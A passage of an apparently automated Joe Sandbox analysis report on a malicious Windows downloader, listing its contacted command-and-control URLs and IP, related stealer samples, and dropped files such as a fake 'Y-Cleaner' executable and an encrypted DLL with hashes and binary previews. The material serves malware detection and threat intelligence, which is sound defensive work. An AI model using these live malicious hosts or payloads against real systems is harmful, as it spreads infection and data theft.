                            https://iplogger.org/1Pz8p7tXEKP1ThBP.exe, 00000004.00000003.1833803865.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1832699006.000000000591E000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1834947373.000000000581D000.00000004.00000020.00020000.00000000.sdmp, tXEKP1ThBP.exe, 00000004.00000003.1835090251.0000000005621000.00000004.00000020.00020000.00000000.sdmp, soft[1].4.dr, Y-Cleaner.exe.4.drfalse
                              		high
                              http://185.156.73.23/add?substr=mixtwo&s=three&sub=empJtXEKP1ThBP.exe, 00000004.00000002.2240611811.0000000000D98000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.156.73.23
                                		unknownRussian Federation
                                		48817RELDAS-NETRUfalse

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1578930
                                Start date and time:2024-12-20 16:44:52 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 6m 29s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:18
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:tXEKP1ThBP.exe
                                renamed because original name is a hash value
                                Original Sample Name:6d81636af92fae98c45898823e103e4f.exe
                                Detection:MAL
                                Classification:mal100.evad.winEXE@2/15@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 13.89.179.12, 13.107.246.63, 20.12.23.50, 20.190.177.149
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                12:44:12API Interceptor243x Sleep call for process: tXEKP1ThBP.exe modified
                                12:45:18API Interceptor1x Sleep call for process: WerFault.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.156.73.23hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download
                                4kahanaK78.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download
                                7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download
                                dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download
                                zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download
                                8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download
                                BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23/soft/download

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                RELDAS-NETRUhvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                4kahanaK78.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                zmTSHkabY6.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                • 185.156.73.23
                                beacon.exeGet hashmaliciousCobaltStrikeBrowse
                                • 185.156.73.37

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]hvm4oOzDaX.exeGet hashmaliciousUnknownBrowse
                                  7JKssbjRDa.exeGet hashmaliciousUnknownBrowse
                                    dI3n4LSHB7.exeGet hashmaliciousUnknownBrowse
                                      8V0INSl0E2.exeGet hashmaliciousUnknownBrowse
                                        BEd2lJRXFM.exeGet hashmaliciousUnknownBrowse
                                          file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                            file.exeGet hashmaliciousUnknownBrowse
                                              file.exeGet hashmaliciousUnknownBrowse
                                                file.exeGet hashmaliciousUnknownBrowse
                                                  file.exeGet hashmaliciousUnknownBrowse

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_tXEKP1ThBP.exe_df58d0e6b77e7e752717997ea65e1fdfb7df79_2f6979da_46c3a021-d382-4710-aac9-001b337f2de5\Report.wer

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.9867314376322357
                                                    Encrypted:false
                                                    SSDEEP:96:09wvz6AOWsghNK7YjSYQXIDcQ/c6F4hcEKcw3AK++HbHg/8BRTf3Oy1oVazW0H93:Mwv+5Ww0x54hQVjud3szuiFIZ24IO83
                                                    MD5:32D6C2AEF6F25AECA539A9A6C8C8FB14
                                                    SHA1:0E598175717E293E765D8D55E2F8D33496EE1C0E
                                                    SHA-256:10C6B8E2020BAC359C22FB3B18F4675F16C3CB6313785A68B96A765A094A46DD
                                                    SHA-512:378BA56A342F59449D9FC662F7DD582111AD5895261865AFF6D19F4038F082ED79B10494BE9A6DCE4A809D0C22CBE73B636942A64ED42FCF5BD0ED67E6DCFFF2
                                                    Malicious:true
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.1.9.0.2.8.0.5.7.5.0.6.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.1.9.0.2.8.2.2.7.8.1.7.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.6.c.3.a.0.2.1.-.d.3.8.2.-.4.7.1.0.-.a.a.c.9.-.0.0.1.b.3.3.7.f.2.d.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.3.1.c.8.9.9.-.7.6.b.9.-.4.2.6.8.-.9.0.b.c.-.c.3.b.1.7.5.2.5.d.5.b.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.t.X.E.K.P.1.T.h.B.P...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.0.-.0.0.0.1.-.0.0.1.4.-.1.4.5.7.-.5.c.3.d.f.6.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.1.f.5.5.e.b.2.f.0.c.6.b.1.f.f.4.1.1.7.f.c.e.f.0.0.9.2.7.7.6.2.0.0.0.0.f.f.f.f.!.0.0.0.0.0.0.d.e.6.0.7.e.b.0.d.0.8.d.d.7.9.3.6.2.1.1.f.2.5.e.a.4.0.1.9.4.4.3.e.5.2.d.d.1.!.t.X.E.K.P.1.T.h.B.P...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4C0.tmp.dmp

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 14 streams, Fri Dec 20 17:44:41 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):46258
                                                    Entropy (8bit):2.5441961750805633
                                                    Encrypted:false
                                                    SSDEEP:384:iXgDvU6XZP+mdAWdCKaJtQyT+QcZF76h79i:iXCM6pP+IAWdCRV6Q/8
                                                    MD5:3C55FBBD7F2C3977A7A5D093BE70996D
                                                    SHA1:14BAB54C09A737D912AA68A67A7FAAB9F62C9C08
                                                    SHA-256:F1EBB4BE44534CD505511154BF5183E704287B02E59421C59996CC03E42C2558
                                                    SHA-512:3965ADF463D0CC1240656DED281ADDFE785CDDFE59832AD3B6BFA73C91ECB657A37D00C862CEEF73EC06B6D4BC811B5E89F45ECF648AF7A8EA3509212BC18A5A
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... .........eg............4...........8...<.......D....,..........T.......8...........T............A...s..........t...........` ..............................................................................eJ....... ......GenuineIntel............T...........,.eg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC955.tmp.WERInternalMetadata.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8402
                                                    Entropy (8bit):3.6925577912108896
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJ6X6/6YNZSU96WadfpgmfCDppDM89bE8sfcjsm:R6lXJS6/6YzSU96WofpgmfCJEPfC
                                                    MD5:15FA498C13088D08933FD4E94B09F0F1
                                                    SHA1:427CFA1813A3F9E428DDDE349AA11311D2DBB0F7
                                                    SHA-256:87BD5AC5788D870104BD0F0FDBB9CE874925C14724604BCE8BC67DFBCB52EFE8
                                                    SHA-512:BF91A5A743C48FA7AB74124F7CE8FD2A25CBBBA5135182FC9D1C301D2AAD6B4960D145BA6093D26DC8DD8D6C5E9A1856FB6A5DBC61361A6D22B313271CC30AF8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.2.4.<./.P.i.

                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC9D3.tmp.xml

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4680
                                                    Entropy (8bit):4.4681931874398915
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zslJg77aI91jKWpW8VYAYm8M4JB0hUVF3+q8vUhU2sA950zi0Ud:uIjf/I7Hjr7VIJhKqhAzTUd
                                                    MD5:91C7A98BC326D39EE5D77BB007395910
                                                    SHA1:B79E4B7984B4824820AF2A2DDB0C84A42A5D0346
                                                    SHA-256:7B2D47FBBB3AE3D170BD9ABA31DBEA20C2F3F4DF49F146F862045A70EE0DD43F
                                                    SHA-512:B673B3172341678B9CD771B57FABD4393C8F813AEB956B06FEE58A9EB4B712D77E56E467D62DED8922E1AD54F576FA7F47F29A055447EC607A8C3B2420E6E3F8
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="639887" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\download[1].htm

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:V:V
                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:0

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\add[1].htm

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:V:V
                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:0

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):242176
                                                    Entropy (8bit):6.47050397947197
                                                    Encrypted:false
                                                    SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                    MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                    SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                    SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                    SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
                                                    • Filename: hvm4oOzDaX.exe, Detection: malicious, Browse
                                                    • Filename: 7JKssbjRDa.exe, Detection: malicious, Browse
                                                    • Filename: dI3n4LSHB7.exe, Detection: malicious, Browse
                                                    • Filename: 8V0INSl0E2.exe, Detection: malicious, Browse
                                                    • Filename: BEd2lJRXFM.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\download[1].htm

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:V:V
                                                    MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                    SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                    SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                    SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                    Malicious:false
                                                    Preview:0

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\fuckingdllENCR[1].dll

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):97296
                                                    Entropy (8bit):7.9982317718947025
                                                    Encrypted:true
                                                    SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                    MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                    SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                    SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                    SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                    Malicious:false
                                                    Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\key[1].htm

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):21
                                                    Entropy (8bit):3.880179922675737
                                                    Encrypted:false
                                                    SSDEEP:3:gFsR0GOWW:gyRhI
                                                    MD5:408E94319D97609B8E768415873D5A14
                                                    SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                    SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                    SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                    Malicious:false
                                                    Preview:9tKiK3bsYm4fMuK47Pk3s

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1502720
                                                    Entropy (8bit):7.646111739368707
                                                    Encrypted:false
                                                    SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                    MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                    SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                    SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                    SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 75%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                    C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Bunifu_UI_v1.5.3.dll

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):242176
                                                    Entropy (8bit):6.47050397947197
                                                    Encrypted:false
                                                    SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                    MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                    SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                    SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                    SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                    C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exe

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1502720
                                                    Entropy (8bit):7.646111739368707
                                                    Encrypted:false
                                                    SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                    MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                    SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                    SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                    SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 75%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                    C:\Users\user\Desktop\Cleaner.lnk

                                                    Download File
                                                    Process:C:\Users\user\Desktop\tXEKP1ThBP.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 20 16:44:39 2024, mtime=Fri Dec 20 16:44:39 2024, atime=Fri Dec 20 16:44:39 2024, length=1502720, window=hide
                                                    Category:modified
                                                    Size (bytes):2201
                                                    Entropy (8bit):3.9517557621488577
                                                    Encrypted:false
                                                    SSDEEP:24:8QgB22hgPRjgK3RvQAI3kvNQSfuSBZ3LLuSbs1RUwqygm:8Q42e2RDRvnI3kvNQYuuZ3vu1Rmyg
                                                    MD5:62195F30FBC233D94E81E24E4B3134D0
                                                    SHA1:A87D8646A6F2F69B8FA1E3EDCA7D4FE0801059D4
                                                    SHA-256:29880E9D215F15F6E96BF4EE503FE9AEFD4EF613E280434BC895890E894A0857
